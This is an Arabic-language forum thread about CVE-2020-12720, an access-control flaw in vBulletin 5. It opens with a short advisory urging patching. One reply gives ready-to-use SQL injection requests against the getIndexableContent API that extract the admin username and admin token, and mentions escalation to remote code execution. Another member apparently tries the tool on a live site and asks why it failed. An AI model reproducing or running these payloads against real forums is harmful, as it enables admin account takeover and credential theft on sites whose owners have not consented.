الحماية للأبد -Security 4 Ever

الحماية للأبد -Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   قسم الأخبار التقنية والنقاشات الجادة (https://www.sec4ever.com/home/forumdisplay.php?f=98)
-   -   [خبر] CVE-2020-12720 ثغرة جديدة للفيبي vbulletin (https://www.sec4ever.com/home/showthread.php?t=19785)

Sec4ever 12-05-2020 02:41 AM

CVE-2020-12720 ثغرة جديدة للفيبي vbulletin
 
بسم الله الرحمان الرحيم

السلام عليكم و رحمة الله و بركاته .


https://www.sec4ever.com/images/vbulletin.png

ثغرة جديدة في النسخة الخامسة من سكريبت المنتديات المشهور Vbulletin 5 عبارة عن تخطى صلاحيات .

اقتباس:

vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
الأستغلال اعتقد غير منتشر في النت لحد الأن و لذلك وجب التنبيه و ترقيع النسخ القديمة من الأصدار الخامس للمنتدى .

المصادر :
the hacker news

NATIONAL VULNERABILITY DATABASE

mehdi racha 14-05-2020 11:16 AM

رد: CVE-2020-12720 ثغرة جديدة للفيبي vbulletin
 
1 مرفق
Get vBulletin 5.6.1 admin user

كود:

"http://SITE/vb5/ajax/api/content_infraction/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,username,8,7,6,5,4,3,2,1+from+user+where+userid=1--"
Get vBulletin 5.6.1 admin token POC


كود:

"http://SITE/vb5/ajax/api/content_infraction/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,token,8,7,6,5,4,3,2,1+from+user+where+userid=1--"

mehdi racha 14-05-2020 11:00 PM

رد: CVE-2020-12720 ثغرة جديدة للفيبي vbulletin
 
sql injection to rce



ElSyad 15-05-2020 10:48 AM

رد: CVE-2020-12720 ثغرة جديدة للفيبي vbulletin
 
@mehdi racha
طبقت علي موقع المفروض انه مصاب والاداة ادتني النتيجة دي
https://i.imgur.com/8oer49P.png
جربت الاداة علي كالي لينكس برضو ادتني نفس النتيجة
هل الخطأ من الموقع نفسه او من الاداة؟
شكرا لك مقدما

mehdi racha 15-05-2020 01:24 PM

رد: CVE-2020-12720 ثغرة جديدة للفيبي vbulletin
 
اقتباس:

المشاركة الأصلية كتبت بواسطة ElSyad (المشاركة 104636)
@mehdi racha
طبقت علي موقع المفروض انه مصاب والاداة ادتني النتيجة دي
https://i.imgur.com/8oer49P.png
جربت الاداة علي كالي لينكس برضو ادتني نفس النتيجة
هل الخطأ من الموقع نفسه او من الاداة؟
شكرا لك مقدما



الساعة الآن 08:05 PM

Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.